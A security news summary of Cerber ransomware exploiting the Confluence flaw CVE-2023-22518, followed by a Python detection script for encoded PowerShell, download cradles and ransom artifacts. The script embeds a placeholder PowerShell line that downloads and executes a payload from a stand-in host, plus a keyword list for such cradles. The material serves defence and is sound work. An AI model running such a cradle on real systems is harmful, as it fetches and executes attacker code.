November 10, 2023 at 05:23AM
Cerber ransomware has been exploiting the Atlassian Confluence vulnerability CVE-2023-22518, an improper-authorization flaw that lets an unauthenticated attacker reset a Confluence instance and create a new instance administrator account, giving them full admin privileges. Cerber previously targeted Atlassian Confluence in 2021. In the current campaign the ransomware uses an encoded PowerShell command to download and execute a remote payload, which encrypts files and appends the extension “.L0CK3D”. Atlassian users are advised to install the fixed versions and apply additional protection measures to reduce the risk.
Key Takeaways:
1. The Cerber ransomware has been exploiting the Atlassian Confluence vulnerability CVE-2023-22518.
2. Atlassian published an advisory on the vulnerability, stating that it allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account, granting them admin privileges.
3. The proof-of-concept (PoC) for the CVE-2023-22518 vulnerability was leaked to the public on November 2, 2023.
4. The Cerber ransomware has previously targeted Atlassian: its 2021 campaign exploited remote code execution vulnerabilities in Atlassian Confluence and GitLab servers.
5. The Cerber ransomware uses an encoded PowerShell command to download and execute a remote payload.
6. The PowerShell script connects to a command-and-control (C&C) server and downloads a malicious text file.
7. The decoded text file contains the Cerber ransomware payload.
8. The Cerber ransomware encrypts files in the system and appends the extension “.L0CK3D” to them.
9. The ransomware drops a ransom note named “read-me3.txt” in all directories.
10. In addition to the Windows attack chain launched through the Confluence vulnerability, Cerber also deploys ransomware variants on Linux systems.
11. The new Cerber variant exploiting CVE-2023-22518 shares much of its behavior with previous versions but differs in the file extension it appends and in the ransom note format.
12. It is recommended that Confluence users promptly install patches to address the CVE-2023-22518 vulnerability. Temporary mitigation procedures are available if patching is not immediately possible.
13. Trend Vision One customers can utilize its attack surface risk management and Extended Detection and Response (XDR) capabilities to stay informed and protected.
14. Additional protection against CVE-2023-22518 exploits can be achieved through Trend Cloud One – Network Security & TippingPoint Protection Filters and Trend Cloud One – Workload Security & Deep Security IPS Rules.
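The detection side of takeaways 5 through 9 is easy to get wrong in practice: the `-EncodedCommand` argument is base64 over UTF-16LE, not UTF-8, and the indicators to hunt for after the fact are the “.L0CK3D” extension and the “read-me3.txt” note. The following Python is an added example for this page, not code from Trend Micro, Atlassian or the Cerber operators. The process-creation events it triages and the directory tree it scans are constructed inline; the encoded command is a benign placeholder that merely imitates a download cradle (the page does not quote the real Cerber command), the cradle keywords, the TEST-NET address and the Confluence install path are assumptions, and the “PowerShell spawned by java.exe” heuristic is an assumed parent-process rule rather than something the write-up states.

```python
"""Detection helpers for the Cerber activity described above.

Added example for this page; not code from Trend Micro, Atlassian or the
Cerber operators. The events and directory tree below are constructed here,
and the encoded command is a benign placeholder imitating a download cradle.
"""
import base64
import re
import tempfile
from pathlib import Path
from typing import List, Optional

# Artifacts the write-up attributes to this Cerber variant.
CERBER_EXTENSION = ".L0CK3D"
CERBER_NOTE = "read-me3.txt"

# Tokens typical of PowerShell download cradles (assumed indicators chosen for
# this example; the page does not quote the actual Cerber command).
_CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
    r"invoke-expression|frombase64string|\biex\b",
    re.IGNORECASE,
)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
_ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # covers bad base64 (binascii.Error) and invalid UTF-16
        return None


def triage_event(event: dict) -> List[str]:
    """Return the reasons a process-creation event resembles the Cerber cradle (empty = benign)."""
    reasons = []
    decoded = decode_encoded_powershell(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded-command")
    # Look for cradle tokens in the decoded script when there is one, else in the raw command line.
    if _CRADLE.search(decoded if decoded is not None else event["cmdline"]):
        reasons.append("download-cradle")
    # Assumed heuristic: Confluence runs inside java.exe, so a Java process
    # launching PowerShell matches the post-exploitation shape described above.
    if event["parent"].lower().endswith("java.exe"):
        reasons.append("spawned-by-java")
    return reasons


# Constructed sample events (hypothetical paths and a TEST-NET address, not real telemetry).
PLACEHOLDER_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/payload.txt')"
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Atlassian\Confluence\jre\bin\java.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(PLACEHOLDER_CRADLE)},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]


def find_cerber_artifacts(root: Path) -> dict:
    """List encrypted files and ransom notes under root, as POSIX paths relative to root."""
    encrypted, notes = [], []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if p.name.endswith(CERBER_EXTENSION):
            encrypted.append(rel)
        elif p.name.lower() == CERBER_NOTE:
            notes.append(rel)
    return {"encrypted": sorted(encrypted), "notes": sorted(notes)}


def demo_scan() -> dict:
    """Build a constructed, partly 'encrypted' tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "docs").mkdir()
        (root / "docs" / ("report.docx" + CERBER_EXTENSION)).write_bytes(b"\x00" * 16)
        (root / "docs" / CERBER_NOTE).write_text("constructed ransom note placeholder")
        (root / CERBER_NOTE).write_text("constructed ransom note placeholder")
        (root / "docs" / "notes.txt").write_text("untouched file")
        return find_cerber_artifacts(root)


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["cmdline"][:60], "->", triage_event(ev) or "benign")
    print(demo_scan())
```

Feeding real process-creation logs (Sysmon event 1, EDR telemetry) into `triage_event` only requires mapping their parent-image and command-line fields onto the two keys used here; the decoded script, not the base64 blob, is what should be matched and retained for analysis.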